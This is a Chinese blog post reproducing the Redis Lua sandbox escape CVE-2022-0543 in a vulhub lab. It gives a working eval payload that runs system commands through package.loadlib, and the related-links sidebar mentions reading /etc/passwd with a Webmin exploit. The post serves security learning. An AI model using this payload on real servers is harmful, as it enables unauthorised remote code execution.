CVE-2022-0543:Redis Lua 沙箱逃逸和远程代码执行

最新推荐文章于 2024-03-25 21:58:24 发布
最新推荐文章于 2024-03-25 21:58:24 发布
阅读量342 收藏 1
点赞数
文章标签: redis lua 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_61489125/article/details/130351328
版权

目录

前言:

环境搭建:vulhub

漏洞复现:

Payload:

复现成功页面:

结束服务:

特此声明:本文仅供安全研究与学习之用,禁止一切危害网络安全行为及其他途径,由使用者承担全部法律及连带责任,作者本人和团队不承担任何法律及连带责任。

前言:

Redis 是一种开源(BSD 许可)内存数据结构存储,用作数据库、缓存和消息代理。

Reginaldo Silva 发现,由于 Debian/Ubuntu 上的打包问题,能够执行任意 Lua 脚本的远程攻击者可能会逃出 Lua 沙箱并在主机上执行任意代码。

环境搭建:vulhub

cd redis/CVE-2022-0543

运行

docker-compose up -d

漏洞复现:

复现前提本地有redis-cli

PS C:\WINDOWS\system32> redis-cli -h 192.168.49.135//有漏洞IP

产生原因:该漏洞的存在是因为Debian/Ubuntu中的Lua库是作为动态库提供的。自动填充了一个package变量,该变量又允许访问任意 Lua 功能。

Payload:

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0

复现成功页面:

结束服务:

docker-compose down

修复建议:目前此漏洞已经修复,建议受影响用户升级更新到以下修复版本,修复链接自行官网。

更多精彩文章 欢迎关注我们,或者移步微信公众号cclhlwork

后续会酌情陆续开放微信小程序社区、博客地址、知识星球等等相关内容分享地址。

注:对文章如有任何疑问,请在后台发送“运营小姐姐”。

cclhlwork
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
CVE-2022-0543 Redis沙盒逃逸漏洞复现(CVE-2022-0543)
XZ_______的博客
04-21 830
漏洞复现
CVE-2022-0543 Redis沙盒逃逸漏洞
weixin_45715461的博客
07-01 3521
CVE-2022-0543 Redis沙盒逃逸漏洞
CVE-2022-0543(redis沙盒逃逸
huayimy的博客
02-03 857
CVE-2022-0543(redis沙盒逃逸借助Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。Redis Labs Redis是美国Redis Labs公司的一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的API。运行完docker-compose后,打开我们的redis就是我们的漏洞环境啦
CVE-2022-0543 Redis Lua 沙盒逃逸 RCE | 附检测工具
dust_hk的博客
03-21 4520
CVE-2022-0543 Redis Lua 沙盒逃逸 RCE 摘要 Redis是一种非常广泛使用的缓存服务,但它也被用作消息代理。客户端通过套接字与 Redis 服务器通信,发送命令,服务器更改其状态(即其内存结构)以响应此类命令。Redis 嵌入了 Lua 编程语言作为其脚本引擎,可通过eval命令使用。Lua 引擎应该是沙盒化的,即客户端可以与 Lua 中的 Redis API 交互,但不能在运行 Redis 的机器上执行任意代码。Debian以及Ubuntu发行版的源在打包Redis时...
CVE-2022-0543
最新发布
sinat_25635183的博客
03-25 307
2、CVE-2022-0543即Redis沙盒逃逸漏洞,Redis Labs 是一家专注于 Redis 数据库的企业公司,提供企业级的 Redis 产品和服务。出现一个新的网页,直接跳转到iana的官网(IANA(Internet Assigned Numbers Authority)是互联网分配号码局,是负责管理全球互联网协议参数的权威组织之一。根据前面的增加链接内容的操作,可以尝试一下将iana网站的链接加在靶场链接的后面。注意:每个人可能打开的网页链接不一样,需要根据自己的情况来操作后面的步骤。
Redis沙盒逃逸漏洞 RCE(CVE-2022-0543)复现+getshell
xiaobai_20190815的博客
03-09 924
Redis沙盒逃逸漏洞 RCE(CVE-2022-0543)复现+getshell
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
CVE-2019-15642:Webmin远程执行代码(已认证)
03-10
CVE-2019-15642 Webmin远程执行代码(已认证) python用法: python CVE-2019-15642.py https://xxx.xxx.xxx:10000 "cat /etc/passwd" Webmin的0x01泊坞窗 cd ~/vulhub/webmin/CVE-2019-15107 docker-compose up -...
CVE-2022-4510:Binwalk 远程代码执行漏洞
07-03
CVE-2022-4510:Binwalk 远程代码执行漏洞
CVE-2020-21224 ClusterEngineV4.0 远程代码执行.md
04-11
CVE-2020-21224 ClusterEngineV4.0 远程代码执行
[漏洞复现]Redis 沙盒逃逸漏洞(CVE-2022-0543)
k5664524的博客
01-25 589
Redis 存在代码注入漏洞,攻击者可利用该漏洞远程执行代码
CVE-2022-0543(redis沙盒逃逸)详细漏洞复现
没事我溜达
03-25 8454
参考:vulhub/README.zh-cn.md at master · vulhub/vulhub · GitHub Redis Lua沙盒绕过命令执行CVE-2022-0543) Redis是著名的开源Key-Value数据库,其具备在沙箱执行Lua脚本的能力。 Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。 直接写复现全过程吧
CVE-2022-0543 Redis Lua 沙盒逃逸 RCE
qq_50854662的博客
01-05 353
CVE-2022-0543 Redis Lua 沙盒逃逸 RCE
[春秋云镜]CVE-2022-0543
niubi707的博客
12-13 804
春秋云镜CVE-2022-0543靶场通关
CVE-2022-0543(lua沙盒绕过命令执行)复现
kriesa的博客
07-13 558
CVE-2022-0543复现
学习lua笔记分享(三)--C#远程加载lua代码
GaoHeShun的博客
07-03 711
.加载文件 Test01: --用递归实现阶乘 function Fac(n) if n<=1 then return n end return n* Fac(n-1) end Test02: --注意:1.加载文件时,保证两个文件在同一路径下 --2.require的特点是加载一次 -- a = require("Test01") -- print("require result=".
Redis Lua沙箱绕过RCE(CVE-2022-0543)复现
3tefanie丶zhou的博客
03-16 2375
【牛角尖扎人,都不如刀子嘴戳人来得厉害】
Redis Lua沙盒绕过命令执行CVE-2022-0543)
swordheart的博客
06-23 414
漏洞原理介绍Redis 是一个开源(BSD 许可)的内存数据结构存储,用作数据库、缓存和消息代理。Redis 是著名的开源Key-Value数据库,其具备在沙箱执行Lua脚本的能力。在 Ubuntu 发行版打包中,不慎在 Lua 沙箱中重新分发一个箱对象,攻击利用这个对象的加载动态库,可以使用从 liblua 加载模块,然后使用此模块执行任意命令;参考链接:漏洞版本 漏洞环境执行如下命令启动一个使用Ubuntu源安装的Redis 5.0.7服务器docker-compose up -d服务启动后,我
cve-2022-30190 msdt远程代码执行漏洞复现
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞的复现过程。 首先,我们需要使用攻击者控制...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值